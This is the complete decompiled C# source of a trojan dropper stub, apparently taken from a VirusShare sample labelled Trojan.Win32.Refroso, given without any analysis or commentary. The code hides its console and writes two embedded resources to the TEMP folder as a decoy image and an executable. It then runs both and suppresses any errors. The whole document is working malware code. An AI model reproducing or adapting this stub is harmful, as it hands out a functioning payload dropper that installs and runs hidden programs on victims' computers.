// Decompiled with JetBrains decompiler // Type: Stub.Program // Assembly: 6665, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 3EA7F22F-E93D-4997-88DA-D77E5698AEDE // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Refroso.hsun-1e7b6217c18613020d2b48d9d7a44991a8b2402c5d71cf4d2d75d96b3e826999.exe using System; using System.Diagnostics; using System.IO; using System.Reflection; using System.Runtime.InteropServices; namespace Stub { internal class Program { public static FileStream F1Stream; public static FileStream F2Stream; [DllImport("kernel32.dll")] public static extern bool FreeConsole(); private static void Main(string[] args) { try { Program.FreeConsole(); bool flag1 = false; bool flag2 = true; bool flag3 = false; bool flag4 = false; bool flag5 = true; bool flag6 = false; Stream manifestResourceStream1 = Assembly.GetExecutingAssembly().GetManifestResourceStream("1.txt"); byte[] buffer1 = new byte[manifestResourceStream1.Length]; manifestResourceStream1.Read(buffer1, 0, buffer1.Length); manifestResourceStream1.Close(); Stream manifestResourceStream2 = Assembly.GetExecutingAssembly().GetManifestResourceStream("2.txt"); byte[] buffer2 = new byte[manifestResourceStream2.Length]; manifestResourceStream2.Read(buffer2, 0, buffer2.Length); Program.F1Stream = !flag2 ? (!flag3 ? new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\1.exe", FileMode.Create) : new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\1.mp3", FileMode.Create)) : new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\1.jpg", FileMode.Create); Program.F1Stream.Write(buffer1, 0, buffer1.Length); Program.F1Stream.Close(); Program.F1Stream.Dispose(); Program.F2Stream = !flag4 ? new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\2.exe", FileMode.Create) : new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\2.bat", FileMode.Create); Program.F2Stream.Write(buffer2, 0, buffer2.Length); Program.F2Stream.Close(); Program.F2Stream.Dispose(); Process process1 = new Process(); process1.StartInfo.FileName = !flag2 ? (!flag3 ? Environment.GetEnvironmentVariable("TEMP") + "\\1.exe" : Environment.GetEnvironmentVariable("TEMP") + "\\1.mp3") : Environment.GetEnvironmentVariable("TEMP") + "\\1.jpg"; if (flag6) process1.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; process1.Start(); if (flag5) process1.WaitForExit(); Process process2 = new Process(); process2.StartInfo.FileName = !flag4 ? Environment.GetEnvironmentVariable("TEMP") + "\\2.exe" : Environment.GetEnvironmentVariable("TEMP") + "\\2.bat"; if (flag1) process2.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; process2.Start(); } catch { } } } }